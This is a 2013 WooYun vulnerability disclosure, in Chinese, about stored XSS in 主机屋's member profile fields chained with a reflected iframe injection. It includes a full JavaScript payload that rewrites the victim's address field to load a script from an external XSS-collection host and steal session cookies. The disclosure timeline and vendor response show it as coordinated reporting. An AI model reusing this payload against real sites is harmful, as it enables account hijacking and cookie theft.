当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042343

漏洞标题:主机屋XSS回旋镖--自插点的利用

相关厂商:主机屋

漏洞作者: xiaoL

提交时间:2013-11-08 15:03

修复时间:2013-12-23 15:04

公开时间:2013-12-23 15:04

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-08: 细节已通知厂商并且等待厂商处理中
2013-11-12: 厂商已经确认,细节仅向厂商公开
2013-11-22: 细节向核心白帽子及相关领域专家公开
2013-12-02: 细节向普通白帽子公开
2013-12-12: 细节向实习白帽子公开
2013-12-23: 细节向公众公开

简要描述:

主机屋自插点的利用,这样子的利用可以过了吧。

详细说明:

主机屋会员中心个人信息
详细地址
联系人
QQ处都存在存储型XSS

1.gif


插入语句
"><img src=1 onerror=alert(/xss/)><input type=:hidden
本来是一个自插的点,查找并没有发现越权修改个人信息的地方(@小川),本来以为就是个鸡肋。
找着找着,发现这么个地址
http://www.zhujiwu.com/test/test.asp
貌似是检查白名单的地方,真不知道这个URL到底干嘛用的。
插入的url参数直接带入了iframe框架src
简直是白送的XSS,这样就可以从这跳跃到自插的位置了。
于是我们构造javascript

<meta charset="utf8">
<script lnaguage="javascript">
function createRequest(){
var xmlHttp=false;
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}else if(window.ActiveXObject){
try{
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
}catch(error1){
try{
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}catch(error2){
xmlHttp = false;
}
}
}
return xmlHttp;
}
var getAddress;
if(getAddress=createRequest()){
getAddress.open("GET","/member/account/basic.asp");
getAddress.onreadystatechange=updatePage;
getAddress.send(null);
}
var xml;
function updatePage()
{
if(getAddress.readyState == 4 )
{
if(getAddress.status == 200)
{
var str = getAddress.responseText;
rex = /name="Address" value="(.*)" size="38"/;
var ttt = rex.exec(str);
if(xml=createRequest()){
xml.open("POST","/cmd/member/setBasic.asp?cmd=set");
xml.onreadystatechange = attack;
var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";
xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xml.send(body);
}
}else if(getAddress.status==404){
alert("404");
}else {
alert("status:"+getAddress.statusText);
}
}
}
function attack(){
if(xml.readyState == 4 ){
if(xml.status == 200){
}
}
}
</script>


能够获取当前详细地址,再插入自己的代码,当成伪装了。
主机屋并没有HTTPonly
演示最后的过程
发送我们访问的地址:
http://www.zhujiwu.com/test/test.asp?url=xxxxx.sinaapp.com/xxxx.html
不能暴露sae地址,类似这样的地址。
原始页面:

2.png


访问url后:

3.png


5.png


收到的cookie

7.png


漏洞证明:

个人信息能看到的人还是很多的,比如管理员啊!
这样伪装还能永久劫持个人用户!
如上!

修复方案:

编码输出那三个位置就可以了!

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-12 15:01

厂商回复:

感谢关注主机屋安全,已将此页面删除

最新状态:

暂无